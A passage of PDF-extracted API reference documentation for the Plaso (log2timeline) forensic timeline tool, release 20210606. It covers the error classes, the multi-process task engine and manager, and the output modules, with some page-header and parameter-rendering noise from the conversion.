This file contains the error classes. exception plaso.lib.errors.BadConfigObject Bases: plaso.lib.errors.Error Raised when the configuration object is of the wrong type. exception plaso.lib.errors.BadConfigOption Bases: plaso.lib.errors.Error Raised when a faulty configuration option is encountered. exception plaso.lib.errors.ConnectionError Bases: plaso.lib.errors.Error Error connecting to a service. exception plaso.lib.errors.Error Bases: Exception Base error class. exception plaso.lib.errors.InvalidEvent Bases: plaso.lib.errors.Error Error indicating an event is malformed. exception plaso.lib.errors.InvalidFilter Bases: plaso.lib.errors.Error Error indicating an invalid filter was specified. exception plaso.lib.errors.InvalidNumberOfOperands Bases: plaso.lib.errors.Error The number of operands provided to an objectfilter operator is wrong. exception plaso.lib.errors.MalformedPresetError Bases: plaso.lib.errors.Error Raised when a parser preset definition is malformed. exception plaso.lib.errors.MaximumRecursionDepth Bases: plaso.lib.errors.Error Raised when the maximum recursion depth is reached. exception plaso.lib.errors.NoFormatterFound Bases: plaso.lib.errors.Error Raised when no formatter is found for a particular event object. exception plaso.lib.errors.ParseError Bases: plaso.lib.errors.Error Raised when a parse error occurred. exception plaso.lib.errors.PreProcessFail Bases: plaso.lib.errors.Error Raised when a preprocess module is unable to gather information.

180 Chapter 5. plaso package Plaso (log2timeline), Release 20210606 exception plaso.lib.errors.QueueAlreadyClosed Bases: plaso.lib.errors.Error Raised when an attempt is made to close a queue that is already closed. exception plaso.lib.errors.QueueAlreadyStarted Bases: plaso.lib.errors.Error Raised when an attempt is made to start queue that is already started. exception plaso.lib.errors.QueueClose Bases: plaso.lib.errors.Error Class that implements a queue close exception. exception plaso.lib.errors.QueueEmpty Bases: plaso.lib.errors.Error Class that implements a queue empty exception. exception plaso.lib.errors.QueueFull Bases: plaso.lib.errors.Error Class that implements a queue full exception. exception plaso.lib.errors.SerializationError Bases: plaso.lib.errors.Error Class that defines serialization errors. exception plaso.lib.errors.SourceScannerError Bases: plaso.lib.errors.Error Class that defines source scanner errors. exception plaso.lib.errors.TaggingFileError Bases: plaso.lib.errors.Error Raised when the tagging file is invalid. exception plaso.lib.errors.TimestampError Bases: plaso.lib.errors.Error Class that defines timestamp errors. exception plaso.lib.errors.UnableToLoadRegistryHelper Bases: plaso.lib.errors.Error Raised when unable to load a Registry helper object. exception plaso.lib.errors.UnableToParseFile Bases: plaso.lib.errors.Error Raised when a parser is not designed to parse a file. exception plaso.lib.errors.UserAbort Bases: plaso.lib.errors.Error Class that defines an user initiated abort exception. exception plaso.lib.errors.WrongBencodePlugin Bases: plaso.lib.errors.Error Error reporting wrong bencode plugin used.

5.1. Subpackages 181 Plaso (log2timeline), Release 20210606 exception plaso.lib.errors.WrongFormatter Bases: plaso.lib.errors.Error Raised when the formatter is not applicable for a particular event. exception plaso.lib.errors.WrongPlugin Bases: plaso.lib.errors.Error Raised when the plugin is of the wrong type. exception plaso.lib.errors.WrongQueueType Bases: plaso.lib.errors.Error Raised when an unsupported operation is attempted on a queue. For example, attempting to Pop from a Push-only queue. plaso.lib.line_reader_file module

Binary line reader file-like object. class plaso.lib.line_reader_file.BinaryDSVReader(binary_line_reader, delimiter) Bases: object Basic reader for delimiter separated text files of unknown encoding. This is used for reading data from text files where the content is unknown, or possibly using a mixed encoding. __iter__() Iterates over delimiter separates values. Yields list(bytes) – lines of encoded bytes. class plaso.lib.line_reader_file.BinaryLineReader(file_object, end_of_line=b'\n') Bases: object Line reader for binary file-like objects. end_of_line byte sequence that separates lines from each other. Type bytes MAXIMUM_READ_BUFFER_SIZE = 16777216 __enter__() Enters a with statement. __exit__(exception_type, value, traceback) Exits a with statement. __iter__() Returns a line of text. Yields bytes – line of text. readline(size=None) Reads a single line of text. The functions reads one entire line from the file-like object. A trailing end-of-line indicator (newline by default) is kept in the byte string (but may be absent when a file ends with an incomplete line). An empty byte string is returned only when end-of-file is encountered immediately.

182 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

Parameters size (Optional[int]) – maximum byte size to read. If present and non-negative, it is a maximum byte count (including the trailing end-of-line) and an incomplete line may be returned. Returns line of text. Return type bytes Raises ValueError – if the specified size is less than zero or greater than the maximum size allowed. readlines(sizehint=None) Reads lines of text. The function reads until EOF using readline() and return a list containing the lines read. Parameters sizehint (Optional[int]) – maximum byte size to read. If present, instead of reading up to EOF, whole lines totalling sizehint bytes are read. Returns lines of text. Return type list[bytes] tell() Retrieves the current offset into the file-like object. Returns current offset into the file-like object. Return type int

plaso.lib.loggers module

Logging related classes and functions. class plaso.lib.loggers.CompressedFileHandler(filename, mode='a', encoding='utf-8') Bases: logging.FileHandler Compressed file handler for logging. plaso.lib.loggers.ConfigureLogging(debug_output=False, filename=None, mode='w', quiet_mode=False) Configures the logging root logger. Parameters • debug_output (Optional[bool]) – True if the logging should include debug output. • filename (Optional[str]) – log filename. • mode (Optional[str]) – log file access mode. • quiet_mode (Optional[bool]) – True if the logging should not include information output. Note that debug_output takes precedence over quiet_mode.

5.1. Subpackages 183 Plaso (log2timeline), Release 20210606 plaso.lib.plist module

The plist file object. class plaso.lib.plist.PlistFile Bases: object Class that defines a plist file. root_key the plist root key. Type dict GetValueByPath(path_segments) Retrieves a plist value by path. Parameters path_segments (list[str]) – path segment strings relative to the root of the plist. Returns The value of the key specified by the path or None. Return type object Read(file_object) Reads a plist from a file-like object. Parameters file_object (dfvfs.FileIO) – a file-like object containing plist data. Raises • IOError – if the plist file-like object cannot be read. • OSError – if the plist file-like object cannot be read. plaso.lib.specification module

The format specification classes. class plaso.lib.specification.FormatSpecification(identifier, text_format=False) Bases: object The format specification. AddNewSignature(pattern, offset=None) Adds a signature. Parameters • pattern (bytes) – pattern of the signature. • offset (int) – offset of the signature. None is used to indicate the signature has nooffset. A positive offset is relative from the start of the data a negative offset is relative fromthe end of the data. IsTextFormat() Determines if the format is a text format. Returns True if the format is a text format, False otherwise. Return type bool

184 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

class plaso.lib.specification.FormatSpecificationStore Bases: object The store for format specifications. AddNewSpecification(identifier) Adds a new format specification. Parameters identifier (str) – format identifier, which should be unique for the store. Returns format specification. Return type FormatSpecification Raises KeyError – if the store already contains a specification with the same identifier. AddSpecification(specification) Adds a format specification. Parameters specification (FormatSpecification) – format specification. Raises KeyError – if the store already contains a specification with the same identifier. GetSpecificationBySignature(signature_identifier) Retrieves a specification mapped to a signature identifier. Parameters signature_identifier (str) – unique signature identifier for a specification store. Returns format specification or None if the signature identifier does not exist within the specification store. Return type FormatSpecification property specifications specifications iterator. Type iterator class plaso.lib.specification.Signature(pattern, offset=None) Bases: object The format specification signature. The signature consists of a byte string pattern, an optional offset relative to the start of the data, and avalueto indicate if the pattern is bound to the offset. SetIdentifier(identifier) Sets the identifier of the signature in the specification store. Parameters identifier (str) – unique signature identifier for a specification store.

5.1. Subpackages 185 Plaso (log2timeline), Release 20210606

Module contents

5.1.9 plaso.multi_process package

Submodules plaso.multi_process.analysis_engine module

The task-based multi-process processing analysis engine. class plaso.multi_process.analysis_engine.AnalysisMultiProcessEngine(worker_memory_limit=None, worker_timeout=None) Bases: plaso.multi_process.task_engine.TaskMultiProcessEngine Task-based multi-process analysis engine. This class contains functionality to: * monitor and manage analysis tasks; * merge results returned by analysis worker processes. AnalyzeEvents(session, knowledge_base_object, storage_writer, data_location, analysis_plugins, processing_configuration, event_filter=None, event_filter_expression=None, status_update_callback=None, storage_file_path=None) Analyzes events in a Plaso storage. Parameters • session (Session) – session in which the events are analyzed. • knowledge_base_object (KnowledgeBase) – contains information from the source data needed for processing. • storage_writer (StorageWriter) – storage writer. • data_location (str) – path to the location that data files should be loaded from. • analysis_plugins (dict[str, AnalysisPlugin]) – analysis plugins that should be run and their names. • processing_configuration (ProcessingConfiguration) – processing configuration. • event_filter (Optional[EventObjectFilter]) – event filter. • event_filter_expression (Optional[str]) – event filter expression. • status_update_callback (Optional[function]) – callback function for status updates. • storage_file_path (Optional[str]) – path to the session storage file. Raises KeyboardInterrupt – if a keyboard interrupt was raised.

186 Chapter 5. plaso package Plaso (log2timeline), Release 20210606 plaso.multi_process.analysis_process module

The multi-process analysis process. class plaso.multi_process.analysis_process.AnalysisProcess(event_queue, knowledge_base, session, analysis_plugin, processing_configuration, data_location=None, event_filter_expression=None, **kwargs) Bases: plaso.multi_process.task_process.MultiProcessTaskProcess Multi-processing analysis process. SignalAbort() Signals the process to abort. plaso.multi_process.base_process module

Base class for a process used in multi-processing. class plaso.multi_process.base_process.MultiProcessBaseProcess(processing_configuration, enable_sigsegv_handler=False, **kwargs) Bases: multiprocessing.context.Process Interface for multi-processing process. rpc_port port number of the process status RPC server. Type int abstract SignalAbort() Signals the process to abort. property name process name. Type str run() Runs the process. plaso.multi_process.engine module

The multi-process processing engine. class plaso.multi_process.engine.MultiProcessEngine Bases: plaso.engine.engine.BaseEngine Multi-process engine base. This class contains functionality to: * monitor and manage worker processes; * retrieve a process status information via RPC; * manage the status update thread.

5.1. Subpackages 187 Plaso (log2timeline), Release 20210606 plaso.multi_process.extraction_engine module

The task-based multi-process processing extraction engine. class plaso.multi_process.extraction_engine.ExtractionMultiProcessEngine(maximum_number_of_tasks=None, num- ber_of_worker_processes=0, worker_memory_limit=None, worker_timeout=None) Bases: plaso.multi_process.task_engine.TaskMultiProcessEngine Task-based multi-process extraction engine. This class contains functionality to: * monitor and manage extraction tasks; * merge results returned by extraction worker processes. ProcessSources(session, source_path_specs, storage_writer, processing_configuration, enable_sigsegv_handler=False, status_update_callback=None, storage_file_path=None) Processes the sources and extract events. Parameters • session (Session) – session in which the sources are processed. • source_path_specs (list[dfvfs.PathSpec]) – path specifications of the sources to process. • storage_writer (StorageWriter) – storage writer for a session storage. • processing_configuration (ProcessingConfiguration) – processing configuration. • enable_sigsegv_handler (Optional[bool]) – True if the SIGSEGV handler should be enabled. • status_update_callback (Optional[function]) – callback function for status updates. • storage_file_path (Optional[str]) – path to the session storage file. Returns processing status. Return type ProcessingStatus plaso.multi_process.extraction_process module

The multi-process extraction worker process. class plaso.multi_process.extraction_process.ExtractionWorkerProcess(task_queue, collection_filters_helper, knowledge_base, session, processing_configuration, **kwargs) Bases: plaso.multi_process.task_process.MultiProcessTaskProcess Multi-processing extraction worker process. SignalAbort() Signals the process to abort.

188 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

plaso.multi_process.logger module

The multi-processing sub module logger.

plaso.multi_process.output_engine module

The output and formatting multi-processing engine. class plaso.multi_process.output_engine.OutputAndFormattingMultiProcessEngine Bases: plaso.multi_process.engine.MultiProcessEngine Output and formatting multi-processing engine. ExportEvents(knowledge_base_object, storage_reader, output_module, processing_configuration, deduplicate_events=True, event_filter=None, status_update_callback=None, time_slice=None, use_time_slicer=False) Exports events using an output module. Parameters • knowledge_base_object (KnowledgeBase) – contains information from the source data needed for processing. • storage_reader (StorageReader) – storage reader. • output_module (OutputModule) – output module. • processing_configuration (ProcessingConfiguration) – processing configuration. • deduplicate_events (Optional[bool]) – True if events should be deduplicated. • event_filter (Optional[EventObjectFilter]) – event filter. • status_update_callback (Optional[function]) – callback function for status updates. • time_slice (Optional[TimeSlice]) – slice of time to output. • use_time_slicer (Optional[bool]) – True if the ‘time slicer’ should be used. The ‘time slicer’ will provide a context of events around an event of interest. class plaso.multi_process.output_engine.PsortEventHeap Bases: object Psort event heap. PopEvent() Pops an event from the heap. Returns containing: str: identifier of the event MACB group or None if the event cannot be grouped. str: identifier of the event content. EventObject: event. EventData: event data. Event- DataStream: event data stream. Return type tuple PopEvents() Pops events from the heap.

5.1. Subpackages 189 Plaso (log2timeline), Release 20210606

Yields tuple – containing: str: identifier of the event MACB group or None if the event cannot be grouped. str: identifier of the event content. EventObject: event. EventData: event data. Event- DataStream: event data stream. PushEvent(event, event_data, event_data_stream) Pushes an event onto the heap. Parameters • event (EventObject) – event. • event_data (EventData) – event data. • event_data_stream (EventDataStream) – event data stream. property number_of_events number of events on the heap. Type int plaso.multi_process.plaso_xmlrpc module

XML RPC server and client. class plaso.multi_process.plaso_xmlrpc.ThreadedXMLRPCServer(callback) Bases: plaso.multi_process.rpc.RPCServer Threaded XML RPC server. Start(hostname, port) Starts the process status RPC server. Parameters • hostname (str) – hostname or IP address to connect to for requests. • port (int) – port to connect to for requests. Returns True if the RPC server was successfully started. Return type bool Stop() Stops the process status RPC server. class plaso.multi_process.plaso_xmlrpc.XMLProcessStatusRPCClient Bases: plaso.multi_process.plaso_xmlrpc.XMLRPCClient XML process status RPC client. class plaso.multi_process.plaso_xmlrpc.XMLProcessStatusRPCServer(callback) Bases: plaso.multi_process.plaso_xmlrpc.ThreadedXMLRPCServer XML process status threaded RPC server. class plaso.multi_process.plaso_xmlrpc.XMLRPCClient Bases: plaso.multi_process.rpc.RPCClient XML RPC client.

190 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

CallFunction() Calls the function via RPC. Close() Closes the RPC communication channel to the server. Open(hostname, port) Opens a RPC communication channel to the server. Parameters • hostname (str) – hostname or IP address to connect to for requests. • port (int) – port to connect to for requests. Returns True if the communication channel was established. Return type bool plaso.multi_process.rpc module

The RPC client and server interface. class plaso.multi_process.rpc.RPCClient Bases: object RPC client interface. abstract CallFunction() Calls the function via RPC. abstract Close() Closes the RPC communication channel to the server. abstract Open(hostname, port) Opens a RPC communication channel to the server. Parameters • hostname (str) – hostname or IP address to connect to for requests. • port (int) – port to connect to for requests. Returns True if the communication channel was established. Return type bool class plaso.multi_process.rpc.RPCServer(callback) Bases: object RPC server interface. abstract Start(hostname, port) Starts the RPC server. Parameters • hostname (str) – hostname or IP address to connect to for requests. • port (int) – port to connect to for requests. Returns True if the RPC server was successfully started. Return type bool

5.1. Subpackages 191 Plaso (log2timeline), Release 20210606

abstract Stop() Stops the RPC server. plaso.multi_process.task_engine module

The task-based multi-process processing engine. class plaso.multi_process.task_engine.TaskMultiProcessEngine Bases: plaso.multi_process.engine.MultiProcessEngine Task-based multi-process engine base. This class contains functionality to: * manage task storage used to store task results. plaso.multi_process.task_manager module

The task manager. class plaso.multi_process.task_manager.TaskManager Bases: object Manages tasks and tracks their completion and status. A task being tracked by the manager must be in exactly one of the following states: • abandoned: a task assumed to be abandoned because a tasks that has been queued or was processing exceeds the maximum inactive time. • merging: a task that is being merged by the engine. • pending_merge: the task has been processed and is ready to be merged with the session storage. • processed: a worker has completed processing the task, but it is not ready to be merged into the session storage. • processing: a worker is processing the task. • queued: the task is waiting for a worker to start processing it. It is also possible that a worker has already completed the task, but no status update was collected from the worker while it processed the task. Once the engine reports that a task is completely merged, it is removed from the task manager. Tasks are considered “pending” when there is more work that needs to be done to complete these tasks. Pending applies to tasks that are: * not abandoned; * abandoned, but need to be retried. Abandoned tasks without corresponding retry tasks are considered “failed” when the foreman is done processing.

CheckTaskToMerge(task) Checks if the task should be merged. Parameters task (Task) – task. Returns True if the task should be merged. Return type bool Raises KeyError – if the task was not queued, processing or abandoned. CompleteTask(task) Completes a task. The task is complete and can be removed from the task manager.

192 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

Parameters task (Task) – task. Raises KeyError – if the task was not merging. CreateRetryTask() Creates a task that to retry a previously abandoned task. Returns a task that was abandoned but should be retried or None if there are no abandoned tasks that should be retried. Return type Task CreateTask(session_identifier, storage_format='sqlite') Creates a task. Parameters • session_identifier (str) – the identifier of the session the task is part of. • storage_format (Optional[str]) – the storage format that the task should be stored in. Returns task attribute container. Return type Task GetFailedTasks() Retrieves all failed tasks. Failed tasks are tasks that were abandoned and have no retry task once the foreman is done processing. Returns tasks. Return type list[Task] GetProcessedTaskByIdentifier(task_identifier) Retrieves a task that has been processed. Parameters task_identifier (str) – unique identifier of the task. Returns a task that has been processed. Return type Task Raises KeyError – if the task was not processing, queued or abandoned. GetStatusInformation() Retrieves status information about the tasks. Returns tasks status information. Return type TasksStatus GetTaskPendingMerge(current_task) Retrieves the first task that is pending merge or has a higher priority. This function will check if there is a task with a higher merge priority than the current_task being merged. If so, that task with the higher priority is returned. Parameters current_task (Task) – current task being merged or None if no such task. Returns the next task to merge or None if there is no task pending merge or with a higher priority.

5.1. Subpackages 193 Plaso (log2timeline), Release 20210606

Return type Task HasPendingTasks() Determines if there are tasks running or in need of retrying. Returns True if there are tasks that are active, ready to be merged or need to be retried. Return type bool RemoveTask(task) Removes an abandoned task. Parameters task (Task) – task. Raises KeyError – if the task was not abandoned or the task was abandoned and was not retried. SampleTaskStatus(task, status) Takes a sample of the status of the task for profiling. Parameters • task (Task) – a task. • status (str) – status. StartProfiling(configuration, identifier) Starts profiling. Parameters • configuration (ProfilingConfiguration) – profiling configuration. • identifier (str) – identifier of the profiling session used to create the sample filename. StopProfiling() Stops profiling. UpdateTaskAsPendingMerge(task) Updates the task manager to reflect that the task is ready to be merged. Parameters task (Task) – task. Raises KeyError – if the task was not queued, processing or abandoned, or the task was abandoned and has a retry task. UpdateTaskAsProcessingByIdentifier(task_identifier) Updates the task manager to reflect the task is processing. Parameters task_identifier (str) – unique identifier of the task. Raises KeyError – if the task is not known to the task manager. plaso.multi_process.task_process module

Base class for a process tha handles tasks used in multi-processing. class plaso.multi_process.task_process.MultiProcessTaskProcess(processing_configuration, enable_sigsegv_handler=False, **kwargs) Bases: plaso.multi_process.base_process.MultiProcessBaseProcess Interface for multi-processing process that handles tasks.

194 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

Module contents

5.1.10 plaso.output package

Submodules

plaso.output.dynamic module

Dynamic selected delimiter separated values output module. class plaso.output.dynamic.DynamicFieldFormattingHelper(output_mediator) Bases: plaso.output.formatting_helper.FieldFormattingHelper Dynamic output module field formatting helper. class plaso.output.dynamic.DynamicOutputModule(output_mediator) Bases: plaso.output.shared_dsv.DSVOutputModule Dynamic selected delimiter separated values output module. DESCRIPTION = 'Dynamic selection of fields for a separated value output format.' NAME = 'dynamic' plaso.output.elastic module

An output module that saves events to Elasticsearch. class plaso.output.elastic.ElasticsearchOutputModule(output_mediator) Bases: plaso.output.shared_elastic.SharedElasticsearchOutputModule Output module for Elasticsearch. DESCRIPTION = 'Saves the events into an Elasticsearch database.' MAPPINGS_FILENAME = 'elasticsearch.mappings' NAME = 'elastic' WriteHeader() Connects to the Elasticsearch server and creates the index. plaso.output.elastic_ts module

An output module that saves events to Elasticsearch for Timesketch. class plaso.output.elastic_ts.ElasticTimesketchOutputModule(output_mediator) Bases: plaso.output.shared_elastic.SharedElasticsearchOutputModule Output module for Timesketch Elasticsearch. DESCRIPTION = 'Saves the events into an Elasticsearch database for use with Timesketch.' GetMissingArguments() Retrieves a list of arguments that are missing from the input. Returns names of arguments that are required by the module and have not been specified.

5.1. Subpackages 195 Plaso (log2timeline), Release 20210606

Return type list[str] MAPPINGS_FILENAME = 'plaso.mappings' MAPPINGS_PATH = '/etc/timesketch' NAME = 'elastic_ts' SetTimelineIdentifier(timeline_identifier) Sets the timeline identifier. Parameters timeline_identifier (int) – timeline identifier. WriteHeader() Connects to the Elasticsearch server and creates the index.

plaso.output.formatting_helper module

Output module field formatting helper. class plaso.output.formatting_helper.EventFormattingHelper(output_mediator) Bases: object Output module event formatting helper. abstract GetFormattedEvent(event, event_data, event_data_stream, event_tag) Retrieves a string representation of the event. Parameters • event (EventObject) – event. • event_data (EventData) – event data. • event_data_stream (EventDataStream) – event data stream. • event_tag (EventTag) – event tag. Returns string representation of the event. Return type str class plaso.output.formatting_helper.FieldFormattingHelper(output_mediator) Bases: object Output module field formatting helper. GetFormattedField(field_name, event, event_data, event_data_stream, event_tag) Formats the specified field. Parameters • field_name (str) – name of the field. • event (EventObject) – event. • event_data (EventData) – event data. • event_data_stream (EventDataStream) – event data stream. • event_tag (EventTag) – event tag. Returns value of the field. Return type str

196 Chapter 5. plaso package Plaso (log2timeline), Release 20210606 plaso.output.interface module

This file contains the output module interface classes. class plaso.output.interface.OutputModule(output_mediator) Bases: object Output module interface. Close() Closes the output. DESCRIPTION = '' GetMissingArguments() Retrieves arguments required by the module that have not been specified. Returns names of argument that are required by the module and have not been specified. Return type list[str] NAME = '' Open(**kwargs) Opens the output. WRITES_OUTPUT_FILE = False WriteEvent(event, event_data, event_data_stream, event_tag) Writes the event to the output. Parameters • event (EventObject) – event. • event_data (EventData) – event data. • event_data_stream (EventDataStream) – event data stream. • event_tag (EventTag) – event tag. abstract WriteEventBody(event, event_data, event_data_stream, event_tag) Writes event values to the output. Parameters • event (EventObject) – event. • event_data (EventData) – event data. • event_data_stream (EventDataStream) – event data stream. • event_tag (EventTag) – event tag. WriteEventMACBGroup(event_macb_group) Writes an event MACB group to the output. An event MACB group is a group of events that have the same timestamp and event data (attributes and values), where the timestamp description (or usage) is one or more of MACB (modification, access, change, birth). This function is called if the psort engine detected an event MACB group so that the output module, if supported, can represent the group as such. If not overridden this function will output every event individually. Parameters

5.1. Subpackages 197 Plaso (log2timeline), Release 20210606

• (list[tuple[EventObject (event_macb_group) – EventTag]]): group of events with identical timestamps, attributes and values. • EventData – EventTag]]): group of events with identical timestamps, attributes and values. • EventDataStream – EventTag]]): group of events with identical timestamps, attributes and values.

:param [EventTag]]): group of events with identical timestamps, attributes] and values.

WriteFooter() Writes the footer to the output. Can be used for post-processing or output after the last event is written, such as writing a file footer. WriteHeader() Writes the header to the output. Can be used for pre-processing or output before the first event is written, such as writing a file header. class plaso.output.interface.TextFileOutputModule(output_mediator, event_formatting_helper) Bases: plaso.output.interface.OutputModule Shared functionality of an output module that writes to a text file. Close() Closes the output file. Open(path=None, **kwargs) Opens the output file. Parameters path (Optional[str]) – path of the output file. Raises • IOError – if the specified output file already exists. • OSError – if the specified output file already exists. • ValueError – if path is not set. WRITES_OUTPUT_FILE = True WriteEventBody(event, event_data, event_data_stream, event_tag) Writes event values to the output. Parameters • event (EventObject) – event. • event_data (EventData) – event data. • event_data_stream (EventDataStream) – event data stream. • event_tag (EventTag) – event tag. WriteLine(text) Writes a line of text to the output file. Parameters text (str) – text to output. WriteText(text) Writes text to the output file. Parameters text (str) – text to output.

198 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

plaso.output.json_line module

Output module that saves data into a JSON line format. JSON line format is a single JSON entry or event per line instead of grouping all the output into a single JSON entity. class plaso.output.json_line.JSONLineOutputModule(output_mediator) Bases: plaso.output.interface.TextFileOutputModule Output module for the JSON line format. DESCRIPTION = 'Saves the events into a JSON line format.' NAME = 'json_line' WriteEventBody(event, event_data, event_data_stream, event_tag) Writes event values to the output. Parameters • event (EventObject) – event. • event_data (EventData) – event data. • event_data_stream (EventDataStream) – event data stream. • event_tag (EventTag) – event tag. plaso.output.json_out module

Output module that saves data into a JSON format. class plaso.output.json_out.JSONOutputModule(output_mediator) Bases: plaso.output.interface.TextFileOutputModule Output module for the JSON format. DESCRIPTION = 'Saves the events into a JSON format.' NAME = 'json' WriteEventBody(event, event_data, event_data_stream, event_tag) Writes event values to the output. Parameters • event (EventObject) – event. • event_data (EventData) – event data. • event_data_stream (EventDataStream) – event data stream. • event_tag (EventTag) – event tag. WriteFooter() Writes the footer to the output. WriteHeader() Writes the header to the output.

5.1. Subpackages 199 Plaso (log2timeline), Release 20210606

plaso.output.kml module

An output module that writes event with geography data to a KML XML file. The Keyhole Markup Language (KML) is an XML notation for expressing geographic annotation and visualization within Internet-based, two-dimensional maps and three-dimensional Earth browsers. class plaso.output.kml.KMLOutputModule(output_mediator) Bases: plaso.output.interface.TextFileOutputModule Output module for a Keyhole Markup Language (KML) XML file. DESCRIPTION = 'Saves events with geography data into a KML format.' NAME = 'kml' WriteEventBody(event, event_data, event_data_stream, event_tag) Writes event values to the output. Parameters • event (EventObject) – event. • event_data (EventData) – event data. • event_data_stream (EventDataStream) – event data stream. • event_tag (EventTag) – event tag. WriteFooter() Writes the footer to the output. WriteHeader() Writes the header to the output. plaso.output.l2t_csv module

Output module for the log2timeline (L2T) CSV format. For documentation on the L2T CSV format see: https://forensicswiki.xyz/wiki/index.php?title=L2T_CSV class plaso.output.l2t_csv.L2TCSVEventFormattingHelper(output_mediator, field_formatting_helper, field_names, field_delimiter=',') Bases: plaso.output.shared_dsv.DSVEventFormattingHelper L2T CSV output module event formatting helper. GetFormattedEventMACBGroup(event_macb_group) Retrieves a string representation of the event. Parameters • (list[tuple[EventObject (event_macb_group) – EventTag]]): group of events with identical timestamps, attributes and values. • EventData – EventTag]]): group of events with identical timestamps, attributes and values. • EventDataStream – EventTag]]): group of events with identical timestamps, attributes and values.

:param [EventTag]]): group of events with identical timestamps, attributes] and values.

Returns string representation of the event MACB group.

200 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

Return type str class plaso.output.l2t_csv.L2TCSVFieldFormattingHelper(output_mediator) Bases: plaso.output.formatting_helper.FieldFormattingHelper L2T CSV output module field formatting helper. class plaso.output.l2t_csv.L2TCSVOutputModule(output_mediator) Bases: plaso.output.interface.TextFileOutputModule CSV format used by log2timeline, with 17 fixed fields. DESCRIPTION = 'CSV format used by legacy log2timeline, with 17 fixed fields.' NAME = 'l2tcsv' WriteEventMACBGroup(event_macb_group) Writes an event MACB group to the output. Parameters • (list[tuple[EventObject (event_macb_group) – EventTag]]): group of events with identical timestamps, attributes and values. • EventData – EventTag]]): group of events with identical timestamps, attributes and values. • EventDataStream – EventTag]]): group of events with identical timestamps, attributes and values.

:param [EventTag]]): group of events with identical timestamps, attributes] and values.

WriteHeader() Writes the header to the output. plaso.output.logger module

The output sub module logger. plaso.output.manager module

Output plugin manager. class plaso.output.manager.OutputManager Bases: object Output module manager. classmethod DeregisterOutput(output_class) Deregisters an output class. The output classes are identified based on their NAME attribute. Parameters output_class (type) – output module class. Raises KeyError – if output class is not set for the corresponding data type. classmethod GetDisabledOutputClasses() Retrieves the disabled output classes and its associated name. Yields tuple[str, type] – output module name and class.

5.1. Subpackages 201 Plaso (log2timeline), Release 20210606

classmethod GetOutputClass(name) Retrieves the output class for a specific name. Parameters name (str) – name of the output module. Returns output module class. Return type type Raises • KeyError – if there is no output class found with the supplied name. • ValueError – if name is not a string. classmethod GetOutputClasses() Retrieves the available output classes its associated name. Yields tuple[str, type] – output class name and type object. classmethod HasOutputClass(name) Determines if a specific output class is registered with the manager. Parameters name (str) – name of the output module. Returns True if the output class is registered. Return type bool classmethod NewOutputModule(name, output_mediator) Creates a new output module object for the specified output format. Parameters • name (str) – name of the output module. • output_mediator (OutputMediator) – output mediator. Returns output module. Return type OutputModule Raises • KeyError – if there is no output class found with the supplied name. • ValueError – if name is not a string. classmethod RegisterOutput(output_class, disabled=False) Registers an output class. The output classes are identified based on their NAME attribute. Parameters • output_class (type) – output module class. • disabled (Optional[bool]) – True if the output module is disabled due to the module not loading correctly or not. Raises KeyError – if output class is already set for the corresponding name. classmethod RegisterOutputs(output_classes, disabled=False) Registers output classes. The output classes are identified based on their NAME attribute. Parameters

202 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

• output_classes (list[type]) – output module classes. • disabled (Optional[bool]) – True if the output module is disabled due to the module not loading correctly or not. Raises KeyError – if output class is already set for the corresponding name. plaso.output.mediator module

The output mediator object. class plaso.output.mediator.OutputMediator(knowledge_base, data_location=None, dynamic_time=False, preferred_encoding='utf-8') Bases: object Output mediator. data_location path of the formatter data files. Type Optional[str] DEFAULT_LANGUAGE_IDENTIFIER = 'en-US' DEFAULT_LCID = 1033 GetDisplayNameForPathSpec(path_spec) Retrieves the display name for a path specification. Parameters path_spec (dfvfs.PathSpec) – path specification. Returns human readable version of the path specification. Return type str GetHostname(event_data, default_hostname='-') Retrieves the hostname related to the event. Parameters • event_data (EventData) – event data. • default_hostname (Optional[str]) – default hostname. Returns hostname. Return type str GetMACBRepresentation(event, event_data) Retrieves the MACB representation. Parameters • event (EventObject) – event. • event_data (EventData) – event data. Returns MACB representation. Return type str GetMACBRepresentationFromDescriptions(timestamp_descriptions) Determines the MACB representation from the timestamp descriptions. MACB representation is a shorthand for representing one or more of modification, access, change, birth timestamp descriptions as the letters “MACB” or a “.” if the corresponding timestamp is not set.

5.1. Subpackages 203 Plaso (log2timeline), Release 20210606

Note that this is an output format shorthand and does not guarantee that the timestamps represent the same occurrence. Parameters timestamp_descriptions (list[str]) – timestamp descriptions, which are defined in definitions.TIME_DESCRIPTIONS. Returns MACB representation. Return type str GetMessageFormatter(data_type) Retrieves the message formatter for a specific data type. Parameters data_type (str) – data type. Returns corresponding message formatter or the default message formatter if not available. Return type EventFormatter GetRelativePathForPathSpec(path_spec) Retrieves the relative path for a path specification. Parameters path_spec (dfvfs.PathSpec) – path specification. Returns relateive path of the path specification. Return type str GetStoredHostname() Retrieves the stored hostname. Returns hostname. Return type str GetUsername(event_data, default_username='-') Retrieves the username related to the event. Parameters • event_data (EventData) – event data. • default_username (Optional[str]) – default username. Returns username. Return type str GetWindowsEventMessage(log_source, message_identifier) Retrieves the message string for a specific Windows Event Log source. Parameters • log_source (str) – Event Log source, such as “Application Error”. • message_identifier (int) – message identifier. Returns message string or None if not available. Return type str ReadMessageFormattersFromDirectory(path) Reads message formatters from a directory. Parameters path (str) – path of directory that contains the message formatters configuration files.

204 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

Raises KeyError – if the message formatter is already set for the corresponding data type. ReadMessageFormattersFromFile(path) Reads message formatters from a file. Parameters path (str) – path of file that contains the message formatters configuration. Raises KeyError – if the message formatter is already set for the corresponding data type. SetPreferredLanguageIdentifier(language_identifier) Sets the preferred language identifier. Parameters language_identifier (str) – language identifier string such as “en-US” for US English or “is-IS” for Icelandic. Raises • KeyError – if the language identifier is not defined. • ValueError – if the language identifier is not a string type. SetTimezone(timezone) Sets the timezone. Parameters timezone (str) – timezone. Raises ValueError – if the timezone is not supported. property dynamic_time True if date and time values should be represented in their granularity or semantically. Type bool property encoding preferred encoding. Type str property timezone The timezone. plaso.output.null module

